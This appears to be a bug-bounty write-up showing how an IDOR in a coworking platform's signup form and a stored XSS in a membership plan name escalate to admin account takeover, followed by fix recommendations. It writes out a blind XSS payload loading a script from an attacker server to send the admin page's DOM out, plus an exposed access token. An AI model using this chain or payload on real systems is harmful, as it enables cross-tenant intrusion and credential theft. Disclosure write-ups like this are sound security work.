Deconstructing the Escalation Path: From a Benign Self-XSS to Admin access

The Setup
There's this SaaS product I’d been testing — let’s call it WorkspaceX. It’s a platform for managing coworking spaces: bookings, memberships, internal communication, the works. Pretty well put together.
Each space gets its own subdomain, like:
Admins can create membership plans with different access levels, perks, or pricing. Members can sign up to these plans through public signup forms hosted on the space’s subdomain. Nothing too out of the ordinary.
But in a multi-tenant architecture like this, even a tiny validation miss can lead to dangerous boundary breaks. And that’s exactly what happened here.
Step 1: The Harmless Self-XSS
I started by creating a new membership plan inside my own test space.
Just for fun, I set the plan name to:
I figured if this ever rendered somewhere without sanitization, it’d trigger. No expectations — just curiosity.
Then I used that plan to sign up to my own space, using the public signup form.
After submitting the form, I logged into the admin panel of my space and checked the member details.
Boom — alert(/XSS/)
.
Nothing groundbreaking, just self-XSS. Classic oversight: rendering unescaped user-controlled fields. Good note for later.
Step 2: The Plan ID Tampering Thought
As I was reviewing the signup request, something odd stood out.
The form sends a POST
request to:
...with a body that includes:
membership_plan_id=[some-plan-id]
In theory, that membership_plan_id
should be tied to the specific space you're signing up to, right?
But there was no indication of server-side validation around that plan's origin. That raised a big question:
What if I tried signing up to a different space — say, someone else’s — using a plan ID from my own space?
Step 3: The Real Exploit
So I picked another test space I had set up — a second account on the platform to act as the “victim.”
I opened the public signup form for that space, intercepted the request, and swapped the membership_plan_id
value with the ID of the plan I had created earlier (the one with the XSS payload in the name).
Submitted the request.
It went through. No errors. I was in.
I had just joined my second test space using a plan from my original space — and gained full member-level access to whatever resources the plan allowed: bookings, internal pages, etc.
Step 4: Weaponizing the XSS
Now back to that XSS in the plan name.
I logged into this second space as the admin and viewed the newly signed-up member in the dashboard.
The payload triggered.
Stored XSS, executed inside a privileged admin UI, on a space that didn’t own or create the malicious plan — just displayed it.
A simple alert()
is just a proof of concept. What could I really get? I went back and changed the payload in my plan's name to a Blind XSS one — a script that would copy the entire page's HTML (the DOM) and send it to a server I control:
<script src="https://my-attacker-server.com/steal.js"></script>
I logged into the second space as the admin and viewed the newly signed-up member in the dashboard.
For a moment, nothing happened on the screen. But a second later… ping. My server lit up. I had received the complete DOM of the admin's page.
I opened the file and searched for "token". And there it was, sitting in a script tag in plain text:
<script>
window.accessToken = 'eacbb6bb95b2f891e071bc2ab9344546e615e3f7a6c050b4368093174bc0da9e';
window.locale = 'en';
window.adminSection = true;
</script>
That’s not just a session cookie. That’s a full-blown API key. Using this token, I was able to access the API directly as the space admin. The exploit just went from serious to critical.
To recap:
I signed up to someone else’s space using a plan from my own space.
The platform didn’t validate plan ownership.
My plan name, armed with a Blind XSS payload, was stored and rendered in the victim's admin dashboard.
When the admin viewed the new member, the script executed, stealing the page's source code and sending it to my server.
I found a hardcoded
accessToken
in that code, giving me full control of their account.
What Went Wrong
This exploit is a chain of three failures:
Access Control Logic Flaw: The server accepts foreign
membership_plan_id
values during signup. It doesn’t verify that the plan belongs to the space receiving the signup.Stored XSS via Metadata Injection: The attacker-controlled plan name is stored and rendered unescaped in the victim admin’s dashboard.
Critical Sensitive Data Exposure: The application embedded a high-privilege
accessToken
directly into the page source, making it trivial to steal via the XSS flaw.
This breaks tenant isolation in three serious ways:
Unauthorized access to arbitrary spaces.
Persistent client-side code execution inside admin browsers.
Theft of credentials leading to full account compromise.
Impact
Full Admin Account Takeover: Steal the
accessToken
of any admin who simply views the malicious member in their dashboard.Complete Workspace Compromise: Use the stolen API token to read, modify, or delete any data within the compromised workspace.
Join any space on the platform using just a valid plan ID from an attacker-controlled account.
Access member-only resources you weren’t invited to.
Fix Recommendations
Strictly validate
membership_plan_id
on the server — it must belong to the space receiving the signup.Sanitize or HTML-encode all user-controlled metadata before rendering it, especially in admin views.
Secure Token Handling: Never embed sensitive API tokens directly into the page source. Use secure, HTTP-only cookies for sessions to prevent this type of theft, as they are not accessible to JavaScript.
Final Thoughts
This one started with a classic self-XSS and escalated into a full admin account takeover. The platform trusted a little too much across space boundaries, but the real catastrophe was leaving the keys to the kingdom lying on the floor. The IDOR got me in the door, but the exposed accessToken
let me own the building.
Always validate ownership, but more importantly: never, ever let a secret token touch the client-side DOM.